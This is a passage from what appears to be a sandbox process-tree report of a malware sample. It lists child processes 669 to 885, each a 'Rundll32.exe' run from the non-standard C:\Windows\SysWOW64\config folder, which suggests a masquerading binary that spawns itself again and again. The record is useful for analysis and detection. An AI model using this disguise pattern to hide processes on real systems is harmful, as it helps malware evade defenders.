        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        669⤵
        
        PID:4076
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        670⤵
        
        PID:4644
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        671⤵
        
        PID:4520
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        672⤵
        
        PID:792
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        673⤵
        
        PID:2116
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        674⤵
        
        PID:3032
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        675⤵
        
        PID:4500
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        676⤵
        
        PID:5032
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        677⤵
        
        PID:776
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        678⤵
        
        PID:1372
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        679⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        680⤵
        
        PID:3952
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        681⤵
        
        PID:4544
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        682⤵
        
        PID:5684
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        683⤵
        
        PID:5420
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        684⤵
        
        PID:2444
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        685⤵
        
        PID:468
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        686⤵
        
        PID:232
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        687⤵
        
        PID:412
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        688⤵
        
        PID:4444
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        689⤵
        
        PID:6060
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        690⤵
        
        PID:3112
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        691⤵
        
        PID:2540
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        692⤵
        
        PID:2468
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        693⤵
        
        PID:5904
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        694⤵
        
        PID:2788
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        695⤵
        
        PID:2152
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        696⤵
        
        PID:2948
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        697⤵
        
        PID:5528
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        698⤵
        
        PID:2336
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        699⤵
        
        PID:3336
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        700⤵
        
        PID:936
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        701⤵
        
        PID:5056
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        702⤵
        
        PID:3404
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        703⤵
        
        PID:3540
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        704⤵
        
        PID:1096
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        705⤵
        
        PID:4628
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        706⤵
        
        PID:1248
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        707⤵
        
        PID:2836
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        708⤵
        
        PID:1072
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        709⤵
        
        PID:1824
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        710⤵
        
        PID:2700
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        711⤵
        
        PID:6132
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        712⤵
        
        PID:1688
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        713⤵
        
        PID:5436
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        714⤵
        
        PID:4228
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        715⤵
        
        PID:916
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        716⤵
        
        PID:4816
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        717⤵
        
        PID:4984
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        718⤵
        
        PID:4944
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        719⤵
        
        PID:2952
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        720⤵
        
        PID:3980
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        721⤵
        
        PID:2840
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        722⤵
        
        PID:128
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        723⤵
        
        PID:1016
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        724⤵
        
        PID:572
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        725⤵
        
        PID:1020
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        726⤵
        
        PID:4956
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        727⤵
        
        PID:5688
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        728⤵
        
        PID:2788
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        729⤵
        
        PID:912
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        730⤵
        
        PID:3764
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        731⤵
        
        PID:3144
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        732⤵
        
        PID:1068
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        733⤵
        
        PID:936
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        734⤵
        
        PID:5056
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        735⤵
        
        PID:3404
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        736⤵
        
        PID:3540
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        737⤵
        
        PID:1096
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        738⤵
        
        PID:4992
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        739⤵
        
        PID:1248
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        740⤵
        
        PID:5216
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        741⤵
        
        PID:3396
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        742⤵
        
        PID:3140
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        743⤵
        
        PID:1824
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        744⤵
        
        PID:1780
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        745⤵
        
        PID:6132
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        746⤵
        
        PID:808
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        747⤵
        
        PID:5436
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        748⤵
        
        PID:3992
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        749⤵
        
        PID:5000
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        750⤵
        
        PID:4208
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        751⤵
        
        PID:3528
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        752⤵
        
        PID:3604
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        753⤵
        
        PID:412
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        754⤵
        
        PID:848
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        755⤵
        
        PID:5784
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        756⤵
        
        PID:392
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        757⤵
        
        PID:5184
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        758⤵
        
        PID:4288
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        759⤵
        
        PID:6096
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        760⤵
        
        PID:2692
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        761⤵
        
        PID:2788
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        762⤵
        
        PID:4080
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        763⤵
        
        PID:912
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        764⤵
        
        PID:2980
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        765⤵
        
        PID:6012
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        766⤵
        
        PID:5008
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        767⤵
        
        PID:5548
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        768⤵
        
        PID:5056
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        769⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        770⤵
        
        PID:3288
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        771⤵
        
        PID:3168
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        772⤵
        
        PID:4992
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        773⤵
        
        PID:5860
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        774⤵
        
        PID:3084
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        775⤵
        
        PID:3396
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        776⤵
        
        PID:3140
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        777⤵
        
        PID:1524
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        778⤵
        
        PID:5836
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        779⤵
        
        PID:1032
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        780⤵
        
        PID:416
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        781⤵
        
        PID:4700
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        782⤵
        
        PID:3380
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        783⤵
        
        PID:2092
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        784⤵
        
        PID:3116
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        785⤵
        
        PID:4760
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        786⤵
        
        PID:5788
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        787⤵
        
        PID:5432
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        788⤵
        
        PID:5084
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        789⤵
        
        PID:3112
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        790⤵
        
        PID:5784
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        791⤵
        
        PID:392
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        792⤵
        
        PID:2468
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        793⤵
        
        PID:4288
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        794⤵
        
        PID:6096
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        795⤵
        
        PID:2936
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        796⤵
        
        PID:5064
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        797⤵
        
        PID:3384
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        798⤵
        
        PID:560
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        799⤵
        
        PID:1068
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        800⤵
        
        PID:3292
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        801⤵
        
        PID:4632
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        802⤵
        
        PID:1668
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        803⤵
        
        PID:2792
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        804⤵
        
        PID:3432
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        805⤵
        
        PID:5224
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        806⤵
        
        PID:5844
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        807⤵
        
        PID:1072
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        808⤵
        
        PID:4500
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        809⤵
        
        PID:2020
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        810⤵
        
        PID:3580
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        811⤵
        
        PID:1472
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        812⤵
        
        PID:1152
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        813⤵
        
        PID:2196
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        814⤵
        
        PID:804
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        815⤵
        
        PID:5724
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        816⤵
        
        PID:5632
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        817⤵
        
        PID:5192
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        818⤵
        
        PID:5692
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        819⤵
        
        PID:5832
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        820⤵
        
        PID:2420
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        821⤵
        
        PID:1708
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        822⤵
        
        PID:2920
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        823⤵
        
        PID:3112
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        824⤵
        
        PID:5784
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        825⤵
        
        PID:2756
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        826⤵
        
        PID:1908
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        827⤵
        
        PID:4728
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        828⤵
        
        PID:2692
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        829⤵
        
        PID:3124
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        830⤵
        
        PID:5064
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        831⤵
        
        PID:5492
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        832⤵
        
        PID:3144
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        833⤵
        
        PID:932
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        834⤵
        
        PID:1068
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        835⤵
        
        PID:5056
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        836⤵
        
        PID:4632
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        837⤵
        
        PID:5096
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        838⤵
        
        PID:6140
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        839⤵
        
        PID:5140
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        840⤵
        
        PID:5680
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        841⤵
        
        PID:4488
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        842⤵
        
        PID:2244
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        843⤵
        
        PID:4548
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        844⤵
        
        PID:3580
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        845⤵
        
        PID:584
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        846⤵
        
        PID:3860
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        847⤵
        
        PID:4248
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        848⤵
        
        PID:4920
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        849⤵
        
        PID:5280
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        850⤵
        
        PID:4936
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        851⤵
        
        PID:4420
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        852⤵
        
        PID:3652
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        853⤵
        
        PID:6024
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        854⤵
        
        PID:1680
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        855⤵
        
        PID:6068
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        856⤵
        
        PID:1420
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        857⤵
        
        PID:1528
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        858⤵
        
        PID:5928
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        859⤵
        
        PID:4312
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        860⤵
        
        PID:3912
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        861⤵
        
        PID:2948
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        862⤵
        
        PID:6096
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        863⤵
        
        PID:1604
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        864⤵
        
        PID:2988
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        865⤵
        
        PID:3384
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        866⤵
        
        PID:3128
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        867⤵
        
        PID:912
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        868⤵
        
        PID:1220
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        869⤵
        
        PID:4932
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        870⤵
        
        PID:3292
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        871⤵
        
        PID:3516
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        872⤵
        
        PID:5576
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        873⤵
        
        PID:2352
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        874⤵
        
        PID:5216
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        875⤵
        
        PID:3108
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        876⤵
        
        PID:2744
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        877⤵
        
        PID:676
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        878⤵
        
        PID:5016
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        879⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        880⤵
        
        PID:4620
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        881⤵
        
        PID:4928
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        882⤵
        
        PID:1672
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        883⤵
        
        PID:3952
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        884⤵
        
        PID:4816
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        885⤵
        
        PID:3380
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
